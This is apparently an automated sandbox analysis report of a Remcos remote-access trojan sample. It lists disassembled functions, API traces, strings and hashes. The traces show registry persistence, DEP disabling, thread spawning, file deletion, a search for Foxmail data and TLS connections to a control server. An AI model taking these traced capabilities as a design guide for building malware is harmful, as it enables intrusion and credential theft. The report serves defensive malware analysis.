                                                                                                                                                                • Opcode ID: 847df6d2ab0566ba1979fabd334b2d2d7e480ad290d8508a5f051b48bd9f879b
                                                                                                                                                                • Instruction ID: 9369d32b9622949562fea8c6a17a8ad83f95aa4e8ba32caaeda0408f35edcb70
                                                                                                                                                                • Opcode Fuzzy Hash: 847df6d2ab0566ba1979fabd334b2d2d7e480ad290d8508a5f051b48bd9f879b
                                                                                                                                                                • Instruction Fuzzy Hash: 34D05B3074411C77E51096859C0AEEB779CD705752F000155B904D7281D9A15E0487D2
                                                                                                                                                                Function 0006DB6F Relevance: 49.5, APIs: 13, Strings: 15, Instructions: 548threadsleepfileCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 49 6db6f-6dbe2 call 7ad7f GetModuleFileNameW call 6e250 call 62125 * 2 call 79f88 call 6e640 call 61ead 64 6dbe4-6dc29 call 6e6de call 61e82 call 61fce call 6fa5c call 6e68f call 6e23d 49->64 65 6dc2e-6dcd0 call 61e82 call 61fce call 61e82 call 65449 call 6646f call 6200a call 62000 * 2 call 61e82 call 61fe6 call 65bf1 call 61e82 call 65c55 49->65 91 6dcea-6dcfb call 62000 64->91 107 6dcd2-6dcd9 call 65bf1 65->107 108 6dcde-6dce5 call 6ca50 65->108 107->108 112 6dce7-6dce9 108->112 113 6dcfe-6dd05 108->113 112->91 114 6dd07 113->114 115 6dd09-6dd15 call 795a7 113->115 114->115 118 6dd17-6dd19 115->118 119 6dd1e-6dd31 call 61e82 call 61fce 115->119 118->119 125 6dd33 call 67241 119->125 126 6dd38-6ddc1 call 61e82 call 79e29 call 61f33 call 61f29 call 61e82 call 61fce call 61e82 call 61fce call 61e82 call 61fce call 61e82 call 61fce 119->126 125->126 152 6ddc3-6ddd3 call 61e82 call 61fce 126->152 153 6de2a-6de8d call 68ab3 call 61e82 call 61fce call 620bd call 61fce call 71b45 call 61e82 call 61fce call 99479 126->153 162 6ddd6-6dddf 152->162 191 6de8f 153->191 192 6deaa-6deac 153->192 162->162 164 6dde1-6dde5 162->164 164->153 166 6dde7-6de25 call 61e82 call 61fce call 61e82 call 61fce call 6cb2b call 61f33 call 61f29 164->166 166->153 194 6de91-6dea8 call 7afd8 CreateThread 191->194 195 6deb2 192->195 196 6deae-6deb0 192->196 197 6deb8-6df97 call 620bd * 2 call 797d0 call 61e82 call 61fce call 61e82 call 61fce call 61e82 call 61fce call 99479 call 61e82 call 61fce call 61e82 call 61fce call 61e82 call 61fce call 61e82 call 61fce StrToIntA call 69995 call 61e82 call 61fce 194->197 195->197 196->194 242 6dfd0 197->242 243 6df99-6dfce call 91db2 call 61e82 call 61fce CreateThread 197->243 244 6dfd2-6dfea call 61e82 call 61fce 242->244 243->244 255 6e026-6e039 call 61e82 call 61fce 244->255 256 6dfec-6e021 call 91db2 call 61e82 call 61fce CreateThread 244->256 265 6e03b-6e094 call 61e82 call 61fce call 61e82 call 61fce call 6cadf call 61f33 call 61f29 CreateThread 255->265 266 6e099-6e0ac call 61e82 call 61fce 255->266 256->255 265->266 277 6e0e7-6e10b call 798ee call 61f33 call 61f29 266->277 278 6e0ae-6e0e2 call 61e82 call 61fce call 61e82 call 61fce call 99479 call 6bd58 266->278 299 6e110-6e123 CreateThread 277->299 300 6e10d-6e10e SetProcessDEPPolicy 277->300 278->277 304 6e125-6e12f CreateThread 299->304 305 6e131-6e138 299->305 300->299 304->305 308 6e146 305->308 309 6e13a-6e13d 305->309 313 6e14b-6e17f call 620bd call 65425 call 620bd call 797d0 call 62000 308->313 310 6e184-6e19f call 61fce call 718cf 309->310 311 6e13f-6e144 309->311 323 6e1a5-6e1dc call 79e29 call 61f24 call 719eb call 61f29 call 61f24 310->323 324 6e232-6e23c call 6ce39 call 7326a 310->324 311->313 313->310 344 6e1f5-6e1fa DeleteFileW 323->344 345 6e1de-6e1e1 344->345 346 6e1fc-6e22d call 79e29 call 61f24 call 71d7f call 61f29 * 2 344->346 345->346 348 6e1e3-6e1f0 Sleep call 61f24 345->348 346->324 348->344
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007AD92
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AD9B
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007ADB6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADB9
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADCA
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADCD
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADE2
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADE5
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0006DB89), ref: 0007ADF6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADF9
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0006DB89), ref: 0007AE05
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE08
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0006DB89), ref: 0007AE19
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE1C
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0006DB89), ref: 0007AE2D
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE30
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0006DB89), ref: 0007AE41
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE44
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0006DB89), ref: 0007AE55
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE58
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0006DB89), ref: 0007AE69
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE6C
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0006DB89), ref: 0007AE7D
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE80
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0006DB89), ref: 0007AE91
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE94
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0006DB89), ref: 0007AEA5
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AEA8
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0006DB89), ref: 0007AEB6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AEB9
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\task.exe,00000104), ref: 0006DB96
                                                                                                                                                                  • Part of subcall function 0006FA5C: __EH_prolog.LIBCMT ref: 0006FA61
                                                                                                                                                                  • Part of subcall function 00071B45: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00071B54
                                                                                                                                                                  • Part of subcall function 00071B45: RegSetValueExA.KERNEL32(?,000C34D0,00000000,?,00000000,00000000,000D22B8,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B7C
                                                                                                                                                                  • Part of subcall function 00071B45: RegCloseKey.KERNEL32(?,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B87
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0007B6A8,00000000,00000000,00000000), ref: 0006DEA6
                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,0000000F,00000000,0000002A,00000000,00000000,00000031,00000000,00000011,00000000,00000007,?,00000010,0000000B), ref: 0006DF73
                                                                                                                                                                • new.LIBCMT ref: 0006DF9B
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,000782A6,00000000,00000000,00000000), ref: 0006DFCC
                                                                                                                                                                • new.LIBCMT ref: 0006DFEE
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,000782A6,00000000,00000000,00000000), ref: 0006E01F
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                  • Part of subcall function 000718CF: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,000D2318,?,?,0006E19C,del), ref: 000718E6
                                                                                                                                                                  • Part of subcall function 000718CF: RegQueryValueExA.KERNEL32(?,0006E19C,00000000,00000000,00000000,00000000,?,?,0006E19C,del), ref: 000718FA
                                                                                                                                                                  • Part of subcall function 000718CF: RegCloseKey.KERNEL32(?,?,?,0006E19C,del), ref: 00071905
                                                                                                                                                                  • Part of subcall function 000719EB: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,000D2318), ref: 00071A11
                                                                                                                                                                  • Part of subcall function 000719EB: RegQueryValueExW.ADVAPI32(?,del,00000000,00000000,?,00000400), ref: 00071A32
                                                                                                                                                                  • Part of subcall function 000719EB: RegCloseKey.ADVAPI32(?), ref: 00071A3B
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00061C06,00000000,00000000,00000000), ref: 0006E092
                                                                                                                                                                • SetProcessDEPPolicy.KERNEL32(00000000,00000000,0000002B,00000023,00000016,00000014,00000000,?,00000010,0000000B), ref: 0006E10E
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000E304,00000000,00000000,00000000), ref: 0006E11A
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00070C44,00000000,00000000,00000000), ref: 0006E12F
                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0006E1E6
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0006E1F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Module$Handle$CreateLibraryLoad$Thread$CloseValue$FileOpenQuery$DeleteH_prologLocalNamePolicyProcessSleepTime
                                                                                                                                                                • String ID: $#$Access Level: $Administrator$C:\Users\user\task.exe$DLL$Remcos Agent initialized$Rmc-RNN6CM$Shellcode$Shellcode$Software\$User$del$del$licence$license_code.txt
                                                                                                                                                                • API String ID: 503334946-918920343
                                                                                                                                                                • Opcode ID: ef2cf1c4546cbfd1921c18c74ee8c667ca92b08e3cb71abf733b6306c6b19165
                                                                                                                                                                • Instruction ID: 2557102da0a4939293b9e19bfca617caa35440a2c7cb155a67a487831954371a
                                                                                                                                                                • Opcode Fuzzy Hash: ef2cf1c4546cbfd1921c18c74ee8c667ca92b08e3cb71abf733b6306c6b19165
                                                                                                                                                                • Instruction Fuzzy Hash: 1CF19D70B443452BEB19B7748C67BEE26CB9F91704F08483DB5469B2D3DE698E04C3A2
                                                                                                                                                                Function 0007326A Relevance: 42.8, APIs: 5, Strings: 19, Instructions: 809sleepnetworkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 358 7326a-732b2 call 6210e call 79aa1 call 6210e call 61e82 call 61fce call 99479 371 732b4-732bb Sleep 358->371 372 732c1-7330d call 620bd call 61e82 call 62125 call 79f88 call 649e0 call 61e82 call 6b576 358->372 371->372 387 73381-7341c call 620bd call 61e82 call 62125 call 79f88 call 61e82 * 2 call 66cbb call 62fcc call 6200a call 62000 * 2 call 61e82 call 65c55 372->387 388 7330f-73379 call 61e82 call 624c2 call 61e82 call 61fce call 61e82 call 624c2 call 61e82 call 61fce call 61e82 call 624c2 call 61e82 call 61fce call 64881 372->388 441 7341e-7342a 387->441 442 7342c-73433 387->442 440 7337e 388->440 440->387 443 73438-734ca call 65bf1 call 65449 call 6646f call 62fcc call 620bd call 797d0 call 62000 * 2 call 61e82 call 61fce call 61e82 call 61fce call 73229 441->443 442->443 470 73515-73523 call 6496f 443->470 471 734cc-73510 WSAGetLastError call 7ad10 call 65425 call 620bd call 797d0 call 62000 443->471 476 73525-7354b call 620bd * 2 call 797d0 470->476 477 73550-73565 call 6506b call 64a0a 470->477 491 73de3-73df5 call 64f4b call 6222e 471->491 476->491 477->491 492 7356b-736be call 61e82 * 2 call 65449 call 6646f call 62fcc call 6646f call 62fcc call 620bd call 797d0 call 62000 * 4 call 799d0 call 72901 call 68abc call 9ee5b call 61e82 call 62125 call 624c2 call 61fce * 2 call 71ace 477->492 507 73df7-73e17 call 61e82 call 61fce call 99479 Sleep 491->507 508 73e1d-73e25 call 61ead 491->508 558 736d2-736f9 call 61fce call 71976 492->558 559 736c0-736cd call 65bf1 492->559 507->508 508->387 565 73700-73d4a call 642a7 call 6ce80 call 79e0d call 79eeb call 79d59 call 61e82 GetTickCount call 79d59 call 79cb1 call 79d59 * 2 call 79c61 call 79eeb * 5 call 6e42e call 79eeb call 62ff0 call 62f56 call 62fcc call 62f56 call 62fcc * 3 call 62f56 call 62fcc call 6646f call 62fcc call 6646f call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 62f56 call 62fcc call 6646f call 62fcc * 5 call 62f56 call 62fcc call 62f56 call 62fcc * 7 call 62f56 call 64be3 call 62000 * 50 call 61f29 call 62000 * 6 call 61f29 call 64d38 558->565 566 736fb-736fd 558->566 559->558 811 73d4f-73d56 565->811 566->565 812 73d6a-73d71 811->812 813 73d58-73d5f 811->813 814 73d73-73d78 call 6abf8 812->814 815 73d7d-73daf call 65bb4 call 620bd * 2 call 797d0 812->815 813->812 816 73d61-73d63 813->816 814->815 827 73dc3-73dde call 62000 * 2 call 61f29 815->827 828 73db1-73dbd CreateThread 815->828 816->812 827->491 828->827
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000029,000D22B8,000D2318,00000000), ref: 000732BB
                                                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 000734CC
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00073E17
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                • String ID: | $$#$%I64u$4.9.4 Pro$C:\Users\user\task.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Rmc-RNN6CM$Shellcode$TLS Off$TLS On $h%$h%$h%$hlight$name
                                                                                                                                                                • API String ID: 524882891-944484879
                                                                                                                                                                • Opcode ID: bdea77a8492c9705c5a1b11bd5942313efcbb4c3eaecb23d035f86f5c5753a98
                                                                                                                                                                • Instruction ID: ac5f1362ccf34bb04cf0b50e1de3e0f65f04a24ade17415cc74a22cb391f7c2b
                                                                                                                                                                • Opcode Fuzzy Hash: bdea77a8492c9705c5a1b11bd5942313efcbb4c3eaecb23d035f86f5c5753a98
                                                                                                                                                                • Instruction Fuzzy Hash: 3D524C31A045195BEB19FB34EC63BEE737B9F60300F5081A9B40AA6193EE345F45CBA5
                                                                                                                                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                Function 00064A0A Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 873 64a0a-64a2a connect 874 64a30-64a33 873->874 875 64b5d-64b61 873->875 876 64b59-64b5b 874->876 877 64a39-64a3c 874->877 878 64b63-64b71 WSAGetLastError 875->878 879 64bd9 875->879 880 64bdb-64be0 876->880 881 64a3e-64a65 call 65449 call 620bd call 797d0 877->881 882 64a68-64a72 call 7ee4b 877->882 878->879 883 64b73-64b76 878->883 879->880 881->882 892 64a74-64a7e 882->892 893 64a83-64a90 call 7f06f 882->893 885 64bb3-64bb8 883->885 886 64b78-64bb1 call 7ad10 call 65425 call 620bd call 797d0 call 62000 883->886 889 64bbd-64bd6 call 620bd * 2 call 797d0 885->889 886->879 889->879 892->889 905 64a92-64ab5 call 620bd * 2 call 797d0 893->905 906 64ac9-64ad4 call 7fb4f 893->906 935 64ab8-64ac4 call 7ee91 905->935 918 64b06-64b09 call 7efe6 906->918 919 64ad6-64b04 call 620bd * 2 call 797d0 call 7f298 906->919 929 64b0e-64b13 918->929 919->935 932 64b15-64b38 call 620bd * 2 call 797d0 929->932 933 64b3b-64b56 CreateEventW * 2 929->933 932->933 933->876 935->879
                                                                                                                                                                APIs
                                                                                                                                                                • connect.WS2_32(FFFFFFFF,008572E8,00000010), ref: 00064A22
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00064B42
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00064B50
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00064B63
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                • API String ID: 994465650-2151626615
                                                                                                                                                                • Opcode ID: 522f564b4bca29559e9db1077fe3fa7483f2be9d3fb50766b0255486e4d3645b
                                                                                                                                                                • Instruction ID: 8fa5e9c746d961e75d0c5cb94d1869bb1d2e4b8ad7d41d9a398342016729879f
                                                                                                                                                                • Opcode Fuzzy Hash: 522f564b4bca29559e9db1077fe3fa7483f2be9d3fb50766b0255486e4d3645b
                                                                                                                                                                • Instruction Fuzzy Hash: AE41D4B1B4060177EA147BB9CD5BAADBAA7AB41305F404159F40247E93EF26D824C7E3
                                                                                                                                                                Function 00064F4B Relevance: 18.1, APIs: 12, Instructions: 60synchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F55
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F64
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064F6D
                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 00064F7B
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FB2
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FC7
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00064FCE
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FE3
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FE8
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000652DF), ref: 00064FED
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FFA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,000652DF,?,?,?,00065276), ref: 00064FFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3658366068-0
                                                                                                                                                                • Opcode ID: 7732826d6ec87a9cd05b5c6c70694c6049ec1fabc540e094df91dabb48e13765
                                                                                                                                                                • Instruction ID: 2bfa061e58ca259897eab36414765a4088178ce6795a40e2c58d7baf90c39f4a
                                                                                                                                                                • Opcode Fuzzy Hash: 7732826d6ec87a9cd05b5c6c70694c6049ec1fabc540e094df91dabb48e13765
                                                                                                                                                                • Instruction Fuzzy Hash: 4F21C731144F419FEB316B21DC49B5ABBE2FF40326F104B28E1E651AF1CB6AA851DB54
                                                                                                                                                                Function 00070F08 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 487sleepfileCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
